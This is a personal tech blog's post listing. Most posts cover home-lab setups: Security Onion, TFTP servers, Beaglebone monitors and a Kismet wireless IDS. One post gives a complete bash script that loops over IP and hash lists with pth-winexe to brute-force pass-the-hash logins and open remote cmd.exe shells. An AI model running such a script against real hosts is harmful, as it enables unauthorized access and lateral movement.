Skip to main content

Posts

Security Onion on the Antsle

My Setup of Security Onion on the Antsle:



Recently my IDS box, an Intel Atom D2500 Fanless Mini-ITX PC, D2500CCE, died. 


Truth be told, I think it came from the factory in a bad state, as I originally thought I had a bad graphics driver, but I then noticed that, after much troubleshooting, it wasn't a driver issue at all.  The box just sometimes wouldn't boot up correctly with video.  It seems heat related, something like not enough thermal paste on the CPU, as after it is powered off for a while it is more likely to boot than when it is warm.  Along with that issue, this box maxed out at 4GB of RAM (only has 2 memory slots, each of which will only take a 2GB card max) and had a single processor, so it was under powered for Security Onion.

So, I decided to quit limping along on P.O.S. boxes, and buy a little more heavyweight box for my networked IDS.   Security Onion requires a minimum of 8GB of RAM, and 4 cores per their specs page https://github.com/security-onion-solutions…
Recent posts

Pass-The-Hash BruteForcer

Here's a simple script to try a list of hashes out against a list of IPs:

#!/bin/bash
# This pass the hashes in a file of IPs (passed as the FIRST parameter)
# and test every hash in a file of hashes (passed as the SECOND parameter)
# i.e. root#PassTheHashBruteForcer.sh FileOfIPs.txt FileOfHashes.txt

echo "syntax is: "
echo "root#PassTheHashBruteForcer.sh FileOfIPs.txt FileOfHashes.txt"

while read -r line1
do
    while IFS='' read -r line2 || [[ -n "$line2" ]]; do
#echo "$line1 $line2"
echo "/usr/bin/pth-winexe -U $line2 //$line1 cmd.exe"
/usr/bin/pth-winexe -U $line2 //$line1 cmd.exe
#pth-winexe -U $line //10.11.1.$line1 cmd.exe
        #echo "Text read from file: $line"
    done < "$2"
done < "$1"

atftpd vs tftpd-hpa

Recently I was trying to tftp files from a Windows computer to a Kali box.   One version of Windows worked, but another didn't.    After much troubleshooting, here were my symptoms:

I could tftp a file from-to any Kali box from-to another Kali box
I could NOT tftp files to a specific Windows 7 box from any Kali box
I could NOT tftp files to a Chrooted-Ubuntu-Chromebook box from a Kali box

After MUCH troubleshooting, going through every setting in atftpd, it seemed like it literally was a client OS problem.  Different clients simply would not download files---unacceptable.

Thus, I switched to tftpd-hpa.   To install:
apt-get install tftpd-hpa

files go to/come from /srv/tftp, but it needs to be a tftp user. Thus, I needed to:
chroot -R /srv/tftp

Also, if you want to be able to put files ON the tftp server (from a client), you need to modify /etc/default/tftpd-hpa:
change "TFTP_OPTIONS="--secure" to "TFTP_OPTIONS="--secure --create"

I also changed the IP li…

Temper Temperature monitor on a Beaglebone Black

Beaglebone Black as a temperature monitor:

Recently I wanted to monitor the temperature of my shed.  I thought I'd use a small computer such as a Raspberry Pi or a Beaglebone or Odroid.

My Raspberry Pi boxes were all in use, so I grabbed my Beaglebone, which was doing nothing.

I flashed it with the Debian9.32018-03-054GB SDIoTimage, but that seemed like it was running lots of bloatware and the ethernet interface wouldn't take a static IP with /etc/network/interfaces.

So I went with the Debian9.32018-01-284GB SDLXQTi image instead.  I still had the same problem, that lots of junk was running, and I couldn't configure my interface by modifying /etc/network/interfaces

So my first step was to get rid of all the bloatware.  If you're using a Raspberry Pi or something, you can skip this and just go to the second step below

STEP 1--Remove Blotatware from Beaglebone Black:

With some searching, I came across this post:
https://www.linuxquestions.org/questions/linux-newbie-8/inte…

Kudos to Google and Blogger!

I just spent the past hour or so copy/pasting my GoDaddy Blog that is going away into Blogger.   I have to say, I LIKE Blogger, having only really used it one day.   Pictures, URLs, and everything that I copy/pasted into Blogger worked like a CHAMP!  I can't imagine how it would have been easier, considering that GoDaddy canceled my QuickView Blogcast account, so I couldn't back it up.  But copy/pasting worked great, which shows that Google knows what they are doing!  I used to have a lot of problems with GoDaddy and blogging... So in the end, I guess I'm glad I moved to Blogger!

Moving /opt to new disk

Recently I was playing with a Kali VM and I installed so much stuff to it that I used up the disk!  Literally, I was at 100% used!  Yikes!  

I started to try to delete unnecessary files, trash, cached apt packages, etc, but quickly came to the conclusion that I wanted everything that I had on the Kali VM, and my disk was still 96% full.  So I needed a way to offload files that I still wanted.  
I looked through my VM, which had a single 20GB hard drive, and saw that /usr had 10GB by itself, and /opt had 4GB.  So I decided to create a new virtual hard drive, move over my /opt files, and change /opt's location in /etc/fstab to point to the new directory.   This solved my problem, as my drive that USED to say 96% full, now says 73% full, just by moving /opt.   
Here's how I moved it:
I added a new virtual hard drive in VirtualBox that was 12GB.   I booted up the VM, went into fdisk, and noted (by doing 'ls /dev/sd*') that my new drive was called sdb.  I used fdisk to crea…

Beaglebone Black as a Wireless Intrusion Detection System (WIDS)

Recently I have been wanting a wireless IDS (WIDS) to detect nefarious wifi activity.  I also had a Beaglebone Black hanging around that I wanted to put to good use.   This seemed like a perfect match, and indeed it seems to be so!

I did some research on WIDSs, and although there is SUPPOSED to be several out there, nearly all that I seemed to find was commercial and Windows-based products, not something I could use myself.   
About the only exception to that rule was Kismet, so I decided to give that a try.  Kismet is supposed to work as a WIDS, and per its documentation should catch the following attacks:
Kismet supports the following alerts, where applicable the WVE (Wireless Vulnerability and Exploits, www.wve.org) ID is included: AIRJACKSSID Fingerprint Deprecated The original 802.11 hacking tools, Airjack, set the initial SSID to 'airjack' when starting up. This alert is no longer relevant as the Airjac…